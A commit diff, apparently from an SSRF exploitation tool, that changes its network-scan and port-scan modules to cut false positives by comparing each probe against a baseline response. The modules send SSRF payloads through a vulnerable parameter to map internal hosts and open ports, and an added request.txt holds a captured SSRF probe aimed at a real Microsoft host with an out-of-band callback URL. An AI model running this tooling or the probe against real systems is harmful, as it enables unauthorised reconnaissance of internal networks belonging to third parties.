Fix false-positives in modules networkscan and portscan

modules/networkscan.py

@@ -23,8 +23,11 @@ class exploit():
         # self.add_range("172.17.0.0/16")   # Docker network
         # self.add_range("172.18.0.0/16")   # Docker network
         
+
+
+        r = requester.do_request(args.param, "")
         with concurrent.futures.ThreadPoolExecutor(max_workers=None) as executor:
-            future_to_url = {executor.submit(self.concurrent_request, requester, args.param, ip, "80"): ip for ip in self.ips}
+            future_to_url = {executor.submit(self.concurrent_request, requester, args.param, ip, "80", r): ip for ip in self.ips}
 
 
     def add_range(self, ip_cidr):
@@ -40,12 +43,12 @@ class exploit():
             self.ips.add(socket.inet_ntoa(struct.pack('>I',i)))
 
 
-    def concurrent_request(self, requester, param, host, port):
+    def concurrent_request(self, requester, param, host, port, compare):
         try:
             payload = wrapper_http("", host, port.strip())
             r = requester.do_request(param, payload)
         
-            if not "Connection refused" in r.text:
+            if (not "Connection refused" in r.text) and (r.text != compare.text):
                 timer = datetime.today().time().replace(microsecond=0)
                 print("\t[{}] Found host :{}".format(timer, host+ " "*40))
 

modules/portscan.py

@@ -23,10 +23,10 @@ class exploit():
         for ip in gen_host:
             # We can use a with statement to ensure threads are cleaned up promptly
             with concurrent.futures.ThreadPoolExecutor(max_workers=None) as executor:
-                future_to_url = {executor.submit(self.concurrent_request, requester, args.param, ip, port): port for port in load_ports}
+                future_to_url = {executor.submit(self.concurrent_request, requester, args.param, ip, port, r): port for port in load_ports}
 
 
-    def concurrent_request(self, requester, param, host, port):
+    def concurrent_request(self, requester, param, host, port, compare):
         try:
             payload = wrapper_http("", host, port.strip())
             r = requester.do_request(param, payload)
@@ -36,7 +36,8 @@ class exploit():
                 timer = datetime.today().time().replace(microsecond=0)
                 port = port.strip() + " "*20
 
-                if r.text != '':
+                # Check if the request is the same
+                if r.text != '' and r.text != compare.text:
                     print("\t[{}] IP:{:12s}, Found \033[32mopen     \033[0m port n°{}".format(timer, host, port))
                 else:
                     print("\t[{}] IP:{:12s}, Found \033[31mfiltered\033[0m  port n°{}".format(timer, host, port))

request.txt

@@ -0,0 +1,16 @@
+GET /SelfHelp/AsyncRequest?uri=http://iyklafaerdfz07d9frvljyugs7y0mp.burpcollaborator.net HTTP/1.1
+Host: lighthouse.microsoft.com
+Sec-Ch-Ua: "Chromium";v="91", " Not;A Brand";v="99"
+Sec-Ch-Ua-Mobile: ?0
+Upgrade-Insecure-Requests: 1
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.124 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Sec-Fetch-Site: none
+Sec-Fetch-Mode: navigate
+Sec-Fetch-User: ?1
+Sec-Fetch-Dest: document
+Accept-Encoding: gzip, deflate
+Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
+Connection: close
+
+